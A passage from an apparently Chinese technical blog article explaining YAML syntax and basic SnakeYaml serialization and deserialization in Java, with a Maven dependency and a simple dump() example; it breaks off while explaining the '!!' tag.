即表示url属性值；</span></span></code><code><span class="code-snippet_outer">url: http:<span class="code-snippet__comment">//www.yiibai.com</span></span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__comment"># 即表示server.host属性的值；</span></span></code><code><span class="code-snippet_outer">server:</span></code><code><span class="code-snippet_outer">    host: http:<span class="code-snippet__comment">//www.yiibai.com</span></span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__comment"># 数组,即表示server为[a,b,c]</span></span></code><code><span class="code-snippet_outer">server:</span></code><code><span class="code-snippet_outer">    - <span class="code-snippet__number">120.168</span><span class="code-snippet__number">.0</span><span class="code-snippet__number">.21</span></span></code><code><span class="code-snippet_outer">    - <span class="code-snippet__number">120.168</span><span class="code-snippet__number">.0</span><span class="code-snippet__number">.22</span></span></code><code><span class="code-snippet_outer">    - <span class="code-snippet__number">120.168</span><span class="code-snippet__number">.0</span><span class="code-snippet__number">.23</span></span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__comment"># 常量</span></span></code><code><span class="code-snippet_outer">pi: <span class="code-snippet__number">3.14</span>   <span class="code-snippet__comment"># 定义一个数值3.14</span></span></code><code><span class="code-snippet_outer">hasChild: <span class="code-snippet__keyword">true</span>  <span class="code-snippet__comment"># 定义一个boolean值</span></span></code><code><span class="code-snippet_outer">name: <span class="code-snippet__string">&#39;你好YAML&#39;</span>   <span class="code-snippet__comment"># 定义一个字符串</span></span></code></pre></section><article><p><span style="font-weight: bold;font-size: 18px;">注释</span></p><p><span style="font-size: 15px;">和<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">properties</span>文件格式相同，<span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);">YAML</span>使用<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">#</span>作为注释开始且只有行注释.</span></p><p><span style="font-size: 15px;">YAML基本格式要求:</span></p><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p><span style="font-size: 15px;">大小敏感.</span></p></li><li><p><span style="font-size: 15px;">利用缩进来表示层级关系.</span></p></li><li><p><span style="font-size: 15px;">缩进不能使用<span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);"> TAB </span><span style="background-color: rgb(243, 244, 244);">，</span>只能使用空格且对空格个数没有要求, 只需要相同层级左对齐即可(一般<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">2</span>个或<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">4</span>个空格).</span></p></li></ul><p><span style="font-weight: bold;font-size: 18px;">对象</span></p><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p><span style="font-size: 15px;">对象使用冒号代表, 格式为<span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);"> key: value </span><span style="background-color: rgb(243, 244, 244);">，</span> 需要注意在冒号后加上一个空格.</span></p></li><li><article><p><span style="font-size: 15px;">可以使用缩进来表示层级关系.</span></p></article></li></ul><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="properties"><code><span class="code-snippet_outer"><span class="code-snippet__attr">key</span>:<span class="code-snippet__string"></span></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__attr">demo1</span>: <span class="code-snippet__string">val1</span></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__attr">demo2</span>: <span class="code-snippet__string">val2</span></span></code></pre></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p><span style="font-size: 15px;"><span style="font-size: 15px;letter-spacing: 0.034em;">较为复杂的对象格式, 可以使用问号加一个空格代表一个复杂的</span><span style="font-size: 15px;letter-spacing: 0.034em;color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);"> key </span><span style="font-size: 15px;letter-spacing: 0.034em;">， 配合一个冒号加一个空格代表一个值</span><span style="font-size: 15px;letter-spacing: 0.034em;background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">value.</span></span></p></li></ul><p><br/></p><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;VZRX-1663595832249&#34;,&#34;name&#34;:&#34;heading&#34;,&#34;data&#34;:{&#34;version&#34;:1,&#34;level&#34;:&#34;h2&#34;},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;SOtJ-1663595832247&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;数组&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}},{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;wWfw-1663595850030&#34;,&#34;name&#34;:&#34;list-item&#34;,&#34;data&#34;:{&#34;version&#34;:1,&#34;listId&#34;:&#34;RJbn-1663595850341&#34;,&#34;listLevel&#34;:1,&#34;listType&#34;:&#34;unordered&#34;},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;QQya-1663595850031&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;使用一个短横线加一个空格代表一个数组项.&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}}]"><p><span style="font-weight: bold;font-size: 20px;">数组</span></p><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;VZRX-1663595832249&#34;,&#34;name&#34;:&#34;heading&#34;,&#34;data&#34;:{&#34;version&#34;:1,&#34;level&#34;:&#34;h2&#34;},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;SOtJ-1663595832247&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;数组&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}},{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;wWfw-1663595850030&#34;,&#34;name&#34;:&#34;list-item&#34;,&#34;data&#34;:{&#34;version&#34;:1,&#34;listId&#34;:&#34;RJbn-1663595850341&#34;,&#34;listLevel&#34;:1,&#34;listType&#34;:&#34;unordered&#34;},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;QQya-1663595850031&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;使用一个短横线加一个空格代表一个数组项.&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}}]"><p>使用一个短横线加一个空格代表一个数组项.</p></article></li></ul><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="makefile"><code><span class="code-snippet_outer"><span class="code-snippet__section">demo:</span></span></code><code><span class="code-snippet_outer">    - val1</span></code><code><span class="code-snippet_outer">    - val2</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">或者</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">-   </span></code><code><span class="code-snippet_outer">    - val1</span></code><code><span class="code-snippet_outer">    - val2 <span class="code-snippet__comment"># [[val1, val2]]</span></span></code></pre></section></article><ul class="list-paddingleft-1" style="list-style-type: disc;"><li style="font-size: 15px;"><article><p><span style="font-size: 15px;">相对复杂的写法, 表示是<span style="font-size: 15px;color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);"> companies </span>属性是一个数组, 每一个数组元素又是由<span style="font-size: 15px;background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">id, name, price</span>三个属性构成; 数组也可以使用流式(flow)的方式表示.</span></p></article></li></ul><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="properties"><code><span class="code-snippet_outer"><span class="code-snippet__attr">companies</span>:<span class="code-snippet__string"></span></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__attr">-</span></span></code><code><span class="code-snippet_outer">        <span class="code-snippet__attr">id</span>: <span class="code-snippet__string">1</span></span></code><code><span class="code-snippet_outer">        <span class="code-snippet__attr">name</span>: <span class="code-snippet__string">company1</span></span></code><code><span class="code-snippet_outer">        <span class="code-snippet__attr">price</span>: <span class="code-snippet__string">200W</span></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__attr">-</span></span></code><code><span class="code-snippet_outer">        <span class="code-snippet__attr">id</span>: <span class="code-snippet__string">2</span></span></code><code><span class="code-snippet_outer">        <span class="code-snippet__attr">name</span>: <span class="code-snippet__string">company2</span></span></code><code><span class="code-snippet_outer">        <span class="code-snippet__attr">price</span>: <span class="code-snippet__string">500W</span></span></code></pre></section><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;JeWB-1663595899480&#34;,&#34;name&#34;:&#34;heading&#34;,&#34;data&#34;:{&#34;level&#34;:&#34;h2&#34;},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;KaEx-1663595899481&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;常量&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}},{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;6XC4-1663595911433&#34;,&#34;name&#34;:&#34;list-item&#34;,&#34;data&#34;:{&#34;version&#34;:1,&#34;listId&#34;:&#34;jneS-1663595915434&#34;,&#34;listLevel&#34;:1,&#34;listType&#34;:&#34;unordered&#34;},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;qf7P-1663595911434&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;YAML &#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;color&#34;,&#34;value&#34;:&#34;#F33232&#34;},{&#34;type&#34;:&#34;backgroundColor&#34;,&#34;value&#34;:&#34;#FDEEEE&#34;}]},{&#34;text&#34;:&#34;中提供了多种常量结构, 包括: 整数, 浮点数, 字符串, NULL, 日期, 布尔, 时间.&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}}]"><p><span style="font-weight: bold;font-size: 18px;">常量</span></p><ul class="list-paddingleft-1" style="list-style-type: disc;"><li style="font-size: 15px;"><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;JeWB-1663595899480&#34;,&#34;name&#34;:&#34;heading&#34;,&#34;data&#34;:{&#34;level&#34;:&#34;h2&#34;},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;KaEx-1663595899481&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;常量&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}},{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;6XC4-1663595911433&#34;,&#34;name&#34;:&#34;list-item&#34;,&#34;data&#34;:{&#34;version&#34;:1,&#34;listId&#34;:&#34;jneS-1663595915434&#34;,&#34;listLevel&#34;:1,&#34;listType&#34;:&#34;unordered&#34;},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;qf7P-1663595911434&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;YAML &#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;color&#34;,&#34;value&#34;:&#34;#F33232&#34;},{&#34;type&#34;:&#34;backgroundColor&#34;,&#34;value&#34;:&#34;#FDEEEE&#34;}]},{&#34;text&#34;:&#34;中提供了多种常量结构, 包括: 整数, 浮点数, 字符串, NULL, 日期, 布尔, 时间.&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}}]"><p><span style="font-size: 15px;"><span style="font-size: 15px;color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);">YAML </span>中提供了多种常量结构, 包括: 整数, 浮点数, 字符串, NULL, 日期, 布尔, 时间.</span></p></article></li></ul><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="makefile"><code><span class="code-snippet_outer"><span class="code-snippet__section">boolean: </span></span></code><code><span class="code-snippet_outer">    - TRUE  <span class="code-snippet__comment">#true,True都可以</span></span></code><code><span class="code-snippet_outer">    - FALSE  <span class="code-snippet__comment">#false，False都可以</span></span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__section">float:</span></span></code><code><span class="code-snippet_outer">    - 3.14</span></code><code><span class="code-snippet_outer">    - 6.8523015e+5  <span class="code-snippet__comment">#可以使用科学计数法</span></span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__section">int:</span></span></code><code><span class="code-snippet_outer">    - 123</span></code><code><span class="code-snippet_outer">    - 0b1010_0111_0100_1010_1110    <span class="code-snippet__comment">#二进制表示</span></span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__section">null:</span></span></code><code><span class="code-snippet_outer">    nodeName: &#39;node&#39;</span></code><code><span class="code-snippet_outer">    parent: ~  <span class="code-snippet__comment">#使用~表示null</span></span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__section">string:</span></span></code><code><span class="code-snippet_outer">    - 哈哈</span></code><code><span class="code-snippet_outer">    - &#39;Hello world&#39;  <span class="code-snippet__comment">#可以使用双引号或者单引号包裹特殊字符</span></span></code><code><span class="code-snippet_outer">    - newline</span></code><code><span class="code-snippet_outer">      newline2    <span class="code-snippet__comment">#字符串可以拆成多行，每一行会被转化成一个空格</span></span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__section">date:</span></span></code><code><span class="code-snippet_outer">    - 2018-07-17    <span class="code-snippet__comment">#日期必须使用ISO 8601格式，即yyyy-MM-dd</span></span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__section">datetime: </span></span></code><code><span class="code-snippet_outer">    -  2018-07-17T19:02:31+08:00    <span class="code-snippet__comment">#时间使用ISO 8601格式，时间和日期之间使用T连接，最后使用+代表时区</span></span></code></pre></section><p><span style="font-size: 15px;"></span></p></article><p><br/></p></article><p><br/></p><article><p><span style="font-weight: bold;font-size: 20px;">SnakeYaml 简介</span></p><p><span style="font-size: 15px;"><span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);">Snakeyaml </span>包主要用来解析<span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);"> yaml </span>格式的内容，<span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);"> yaml </span>语言比普通的<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);"> xml </span>与<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);"> properties </span>等配置文件的可读性更高，像是<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);"> Spring </span>系列就支持<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);"> yaml </span>的配置文件，而<span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);">SnakeYaml</span>是一个完整的<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">YAML1.1</span>规范<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">Processor</span>，支持<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">UTF-8/UTF-16</span>，支持<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">Java</span>对象的序列化/反序列化，支持所有<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">YAML</span>定义的类型。</span></p><p><span style="font-size: 15px;"><span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);">Yaml</span>语法参考：</span><span style="color: rgb(0, 56, 132);font-size: 15px;"><a href="https://www.yiibai.com/yaml" target="_blank">https://www.yiibai.com/yaml</a></span></p><p><span style="font-size: 15px;"><span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);">Spring</span>配置文件经常遇到。</span></p><p><span style="font-size: 15px;">推荐一个<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">yml</span>文件转<span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);">yaml</span>字符串的地址，网上部分<span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);">POC</span>是通过<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">yml</span>文件进行本地测试的，实战可能用到的更多的是<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">yaml</span>字符串。</span><span style="color: rgb(0, 56, 132);font-size: 15px;"><a href="https://www.345tool.com/zh-hans/formatter/yaml-formatter" target="_blank">https://www.345tool.com/zh-hans/formatter/yaml-formatter</a></span></p><p><br/></p><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;DgUW-1677923166322&#34;,&#34;name&#34;:&#34;heading&#34;,&#34;data&#34;:{&#34;level&#34;:&#34;h2&#34;},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;ELxa-1677923166320&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;转换流程图&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;bold&#34;},{&#34;type&#34;:&#34;fontSize&#34;,&#34;value&#34;:22}]}]}]}]"><p><span style="font-weight: bold;font-size: 18px;">转换流程图</span></p></article><p><br/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.3446327683615819" data-s="300,640" style="" data-type="png" data-w="708" src="https://wechat2rss.xlab.app/img-proxy/?k=239f77e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrEw1ytnyLktrxHOViaOTzG7eS9awUSLibniaJx0LXGS5PEQ1ibEic7U6xtvQg%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="color: rgb(0, 56, 132);font-size: 15px;"></span></p></article><p><br/></p><p><br/></p><article><p><span style="font-weight: bold;font-size: 20px;">SnakeYaml 使用</span></p><p><span style="font-weight: bold;font-size: 18px;">环境搭建</span></p><p><span style="font-size: 15px;"><span style="font-size: 15px;color: rgb(51, 51, 51);background-color: rgb(255, 255, 255);font-family: Arial;">在</span><span style="font-size: 15px;color: rgb(51, 51, 51);background-color: rgb(243, 244, 244);font-family: Arial;">Maven</span><span style="font-size: 15px;color: rgb(51, 51, 51);background-color: rgb(255, 255, 255);font-family: Arial;">项目中的</span><span style="font-size: 15px;color: rgb(51, 51, 51);background-color: rgb(243, 244, 244);font-family: Arial;">pom.xml</span><span style="font-size: 15px;color: rgb(51, 51, 51);background-color: rgb(255, 255, 255);font-family: Arial;">文件添加依赖:</span></span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="xml"><code><span class="code-snippet_outer"><span class="code-snippet__tag">&lt;<span class="code-snippet__name">dependency</span>&gt;</span></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__tag">&lt;<span class="code-snippet__name">groupId</span>&gt;</span>org.yaml<span class="code-snippet__tag">&lt;/<span class="code-snippet__name">groupId</span>&gt;</span></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__tag">&lt;<span class="code-snippet__name">artifactId</span>&gt;</span>snakeyaml<span class="code-snippet__tag">&lt;/<span class="code-snippet__name">artifactId</span>&gt;</span></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__tag">&lt;<span class="code-snippet__name">version</span>&gt;</span>1.27<span class="code-snippet__tag">&lt;/<span class="code-snippet__name">version</span>&gt;</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__tag">&lt;/<span class="code-snippet__name">dependency</span>&gt;</span></span></code></pre></section></article><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;DMCO-1663596563216&#34;,&#34;name&#34;:&#34;heading&#34;,&#34;data&#34;:{&#34;version&#34;:1,&#34;level&#34;:&#34;h2&#34;},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;TEMZ-1663596563214&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;常用方法&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;bold&#34;},{&#34;type&#34;:&#34;fontSize&#34;,&#34;value&#34;:22}]}]}]}]"><p><span style="font-weight: bold;font-size: 18px;">常用方法</span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="typescript"><code><span class="code-snippet_outer"><span class="code-snippet__built_in">String</span>    dump(<span class="code-snippet__built_in">Object</span> data)</span></code><code><span class="code-snippet_outer">将Java对象序列化为YAML字符串.</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__built_in">void</span>    dump(<span class="code-snippet__built_in">Object</span> data, Writer output)</span></code><code><span class="code-snippet_outer">将Java对象序列化为YAML流.</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__built_in">String</span>    dumpAll(Iterator&lt;? <span class="code-snippet__keyword">extends</span> <span class="code-snippet__built_in">Object</span>&gt; data)</span></code><code><span class="code-snippet_outer">将一系列Java对象序列化为YAML字符串.</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__built_in">void</span>    dumpAll(Iterator&lt;? <span class="code-snippet__keyword">extends</span> <span class="code-snippet__built_in">Object</span>&gt; data, Writer output)</span></code><code><span class="code-snippet_outer">将一系列Java对象序列化为YAML流.</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__built_in">String</span>    dumpAs(<span class="code-snippet__built_in">Object</span> data, Tag rootTag, DumperOptions.FlowStyle flowStyle)</span></code><code><span class="code-snippet_outer">将Java对象序列化为YAML字符串.</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__built_in">String</span>    dumpAsMap(<span class="code-snippet__built_in">Object</span> data)</span></code><code><span class="code-snippet_outer">将Java对象序列化为YAML字符串.</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">&lt;T&gt; T    load(InputStream io)</span></code><code><span class="code-snippet_outer">解析流中唯一的YAML文档, 并生成相应的Java对象.</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">&lt;T&gt; T    load(Reader io)</span></code><code><span class="code-snippet_outer">解析流中唯一的YAML文档, 并生成相应的Java对象.</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">&lt;T&gt; T    load(<span class="code-snippet__built_in">String</span> yaml)</span></code><code><span class="code-snippet_outer">解析字符串中唯一的YAML文档, 并生成相应的Java对象.</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">Iterable&lt;<span class="code-snippet__built_in">Object</span>&gt;    loadAll(InputStream yaml)</span></code><code><span class="code-snippet_outer">解析流中的所有YAML文档, 并生成相应的Java对象.</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">Iterable&lt;<span class="code-snippet__built_in">Object</span>&gt;    loadAll(Reader yaml)</span></code><code><span class="code-snippet_outer">解析字符串中的所有YAML文档, 并生成相应的Java对象.</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">Iterable&lt;<span class="code-snippet__built_in">Object</span>&gt;    loadAll(<span class="code-snippet__built_in">String</span> yaml)</span></code><code><span class="code-snippet_outer">解析字符串中的所有YAML文档, 并生成相应的Java对象.</span></code></pre></section><p><br/></p><article><p><span style="font-weight: bold;font-size: 18px;">序列化与反序列化</span></p><p><span style="font-size: 15px;">主要关注序列化与反序列化</span></p><p><span style="font-size: 15px;"><span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);">SnakeYaml</span>提供了<span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);">Yaml.dump()</span>和<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">Yaml.load()</span>两个函数对<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">yaml</span>格式的数据进行序列化和反序列化。</span></p><ul class="list-paddingleft-1" style="list-style-type: disc;"><li style="font-size: 15px;"><p><span style="font-size: 15px;"><span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);font-weight: bold;">Yaml.load()</span></span><span style="font-size: 15px;"><span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);font-weight: bold;"></span>：入参是一个字符串或者一个文件，经过序列化之后返回一个<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">Java</span>对象；</span></p></li><li style="font-size: 15px;"><article><p><span style="font-size: 15px;"><span style="font-size: 15px;color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);font-weight: bold;">Yaml.dump()</span>：将一个对象转化为<span style="font-size: 15px;background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">yaml</span>文件形式；</span></p></article></li></ul><p><br/></p><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;TIlP-1663596740838&#34;,&#34;name&#34;:&#34;heading&#34;,&#34;data&#34;:{&#34;version&#34;:1,&#34;level&#34;:&#34;h3&#34;},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;uJis-1663596740837&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;序列化&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;bold&#34;},{&#34;type&#34;:&#34;fontSize&#34;,&#34;value&#34;:20}]}]}]}]"><p><span style="font-weight: bold;font-size: 18px;">序列化</span></p></article><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="java"><code><span class="code-snippet_outer"><span class="code-snippet__keyword">package</span> org.example;</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">import</span> org.yaml.snakeyaml.Yaml;</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__class"><span class="code-snippet__keyword">class</span> <span class="code-snippet__title">User</span> </span>{</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">public</span> String name;</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__function"><span class="code-snippet__keyword">public</span> <span class="code-snippet__keyword">void</span> <span class="code-snippet__title">setName</span><span class="code-snippet__params">(String name)</span> </span>{</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__keyword">this</span>.name = name;</span></code><code><span class="code-snippet_outer">    }</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__function"><span class="code-snippet__keyword">public</span> String <span class="code-snippet__title">getName</span><span class="code-snippet__params">()</span> </span>{</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__keyword">return</span> name;</span></code><code><span class="code-snippet_outer">    }</span></code><code><span class="code-snippet_outer">}</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">public</span> <span class="code-snippet__class"><span class="code-snippet__keyword">class</span> <span class="code-snippet__title">App</span> </span></span></code><code><span class="code-snippet_outer">{</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__function"><span class="code-snippet__keyword">public</span> <span class="code-snippet__keyword">static</span> <span class="code-snippet__keyword">void</span> <span class="code-snippet__title">main</span><span class="code-snippet__params">( String[] args )</span></span></span></code><code><span class="code-snippet_outer">{</span></code><code><span class="code-snippet_outer">        User user = <span class="code-snippet__keyword">new</span> User();</span></code><code><span class="code-snippet_outer">        user.setName(<span class="code-snippet__string">&#34;xiaobei&#34;</span>);</span></code><code><span class="code-snippet_outer">        Yaml yaml = <span class="code-snippet__keyword">new</span> Yaml();</span></code><code><span class="code-snippet_outer">        String dump = yaml.dump(user);</span></code><code><span class="code-snippet_outer">        System.out.println(dump);</span></code><code><span class="code-snippet_outer">    }</span></code><code><span class="code-snippet_outer">}</span></code></pre></section><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.7189695550351288" data-s="300,640" style="" data-type="png" data-w="1281" src="https://wechat2rss.xlab.app/img-proxy/?k=fe4767f3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrEXdfvabWXCEqwkgDibAhoukVxyWfiaT6mtRlGYlgbYHMfuyibx18usbeFQ%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p><article><p><span style="font-size: 15px;"><span style="font-size: 15px;color: rgb(51, 51, 51);background-color: rgb(255, 255, 255);font-family: Arial;">这里</span><span style="font-size: 15px;color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);font-family: Arial;"> !! </span><span style="font-size: 15px;color: rgb(51, 51, 